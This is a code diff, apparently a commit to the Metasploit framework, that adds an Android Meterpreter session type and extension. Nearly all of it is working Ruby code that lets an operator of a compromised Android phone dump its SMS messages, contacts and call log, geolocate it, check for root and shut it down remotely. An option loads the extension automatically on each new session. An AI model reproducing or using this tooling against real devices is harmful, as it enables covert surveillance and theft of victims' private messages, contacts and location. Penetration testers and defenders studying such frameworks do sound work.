sempervictus
diff --git a/‎data/android/apk/AndroidManifest.xml
140 Bytes b/‎data/android/apk/AndroidManifest.xml
140 Bytes
diff --git a/‎data/android/apk/resources.arsc
4 Bytes b/‎data/android/apk/resources.arsc
4 Bytes
diff --git a/‎data/android/meterpreter.jar
3.26 KB b/‎data/android/meterpreter.jar
3.26 KB
diff --git a/‎data/android/metstage.jar
0 Bytes b/‎data/android/metstage.jar
0 Bytes
diff --git a/‎data/android/shell.jar
0 Bytes b/‎data/android/shell.jar
0 Bytes
diff --git a/‎data/meterpreter/ext_server_android.jar
37.9 KB b/‎data/meterpreter/ext_server_android.jar
37.9 KB
diff --git a/‎lib/msf/base/sessions/meterpreter_android.rb
Lines changed: 33 additions & 0 deletions b/‎lib/msf/base/sessions/meterpreter_android.rb
Lines changed: 33 additions & 0 deletions
diff --git a/‎lib/msf/base/sessions/meterpreter_options.rb
Lines changed: 6 additions & 0 deletions b/‎lib/msf/base/sessions/meterpreter_options.rb
Lines changed: 6 additions & 0 deletions
diff --git a/‎lib/rex/post/meterpreter/extensions/android/android.rb
Lines changed: 128 additions & 0 deletions b/‎lib/rex/post/meterpreter/extensions/android/android.rb
Lines changed: 128 additions & 0 deletions
diff --git a/‎lib/rex/post/meterpreter/extensions/android/tlv.rb
Lines changed: 40 additions & 0 deletions b/‎lib/rex/post/meterpreter/extensions/android/tlv.rb
Lines changed: 40 additions & 0 deletions
@@ -0,0 +1,33 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+require 'msf/base/sessions/meterpreter_java'
+require 'msf/base/sessions/meterpreter_options'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
+
+  def initialize(rstream, opts={})
+    super
+    self.platform = 'java/android'
+  end
+
+  def load_android
+    original = console.disable_output  
+    console.disable_output = true
+    console.run_single('load android')
+    console.disable_output = original
+  end
+
+end
+
+end
+end
+
@@ -59,6 +59,12 @@ def on_session(session)
       end
     end
 
+    if session.platform =~ /android/i
+      if datastore['AutoLoadAndroid']
+        session.load_android
+      end
+    end
+
     [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
       if (datastore[key].empty? == false)
         args = Shellwords.shellwords( datastore[key] )
 
@@ -0,0 +1,128 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+require 'rex/post/meterpreter/extensions/android/tlv'
+require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/client'
+require 'rex/post/meterpreter/channels/pools/stream_pool'
+
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+###
+# Android extension - set of commands to be executed on android devices.
+# extension by Anwar Mohamed (@anwarelmakrahy)
+###
+
+  
+class Android < Extension
+
+  def initialize(client)
+    super(client, 'android')
+
+    # Alias the following things on the client object so that they
+    # can be directly referenced
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'android',
+          'ext'  => self
+        },
+      ])
+  end
+  
+  def device_shutdown(n)
+    request = Packet.create_request('device_shutdown')
+    request.add_tlv(TLV_TYPE_SHUTDOWN_TIMER, n)
+    response = client.send_request(request)
+    return response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value
+  end 
+  
+  def dump_sms
+    sms = Array.new
+    request = Packet.create_request('dump_sms')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_SMS_GROUP ) { |p|
+
+      sms <<
+      {
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_TYPE).value),
+        'address' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_ADDRESS).value),
+        'body' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_BODY).value).squish,
+        'status' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_STATUS).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_SMS_DATE).value)
+      }
+
+    }
+    return sms
+  end
+
+  def dump_contacts
+    contacts = Array.new
+    request = Packet.create_request('dump_contacts')
+    response = client.send_request(request)
+
+    response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
+
+      contacts <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CONTACT_NAME).value),
+        'email' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_EMAIL)),
+        'number' => client.unicode_filter_encode(p.get_tlv_values(TLV_TYPE_CONTACT_NUMBER))
+      }
+
+    }
+    return contacts
+  end
+
+  def geolocate
+
+    loc = Array.new
+    request = Packet.create_request('geolocate')
+    response = client.send_request(request)
+
+    loc <<
+    {
+      'lat' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LAT).value),
+      'long' => client.unicode_filter_encode(response.get_tlv(TLV_TYPE_GEO_LONG).value)
+    }
+
+    return loc
+  end
+
+  def dump_calllog
+    log = Array.new
+    request = Packet.create_request('dump_calllog')
+    response = client.send_request(request)
+
+    response.each(TLV_TYPE_CALLLOG_GROUP) { |p|
+
+      log <<
+      {
+        'name' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NAME).value),
+        'number' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_NUMBER).value),
+        'date' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DATE).value),
+        'duration' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_DURATION).value),
+        'type' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_CALLLOG_TYPE).value)
+      }
+
+    }
+    return log
+  end
+
+  def check_root
+    request = Packet.create_request('check_root')
+    response = client.send_request(request)
+    response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
+  end
+end
+
+end
+end
+end
+end
+end
@@ -0,0 +1,40 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Android
+
+TLV_TYPE_SMS_ADDRESS      = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9001)
+TLV_TYPE_SMS_BODY         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9002)
+TLV_TYPE_SMS_TYPE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9003)
+TLV_TYPE_SMS_GROUP        = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9004)
+TLV_TYPE_SMS_STATUS       = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9005)
+TLV_TYPE_SMS_DATE         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9006)
+
+TLV_TYPE_CONTACT_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9007)
+TLV_TYPE_CONTACT_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9008)
+TLV_TYPE_CONTACT_EMAIL    = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9009)
+TLV_TYPE_CONTACT_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9010)
+
+TLV_TYPE_GEO_LAT          = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9011)
+TLV_TYPE_GEO_LONG         = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9012)
+
+TLV_TYPE_CALLLOG_NAME     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9013)
+TLV_TYPE_CALLLOG_TYPE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9014)
+TLV_TYPE_CALLLOG_DATE     = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9015)
+TLV_TYPE_CALLLOG_DURATION = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9016)
+TLV_TYPE_CALLLOG_GROUP    = TLV_META_TYPE_GROUP     | (TLV_EXTENSIONS + 9017)
+TLV_TYPE_CALLLOG_NUMBER   = TLV_META_TYPE_STRING    | (TLV_EXTENSIONS + 9018)
+
+TLV_TYPE_CHECK_ROOT_BOOL  = TLV_META_TYPE_BOOL      | (TLV_EXTENSIONS + 9019)
+
+TLV_TYPE_SHUTDOWN_TIMER   = TLV_META_TYPE_UINT      | (TLV_EXTENSIONS + 9020)
+
+end
+end
+end
+end
+end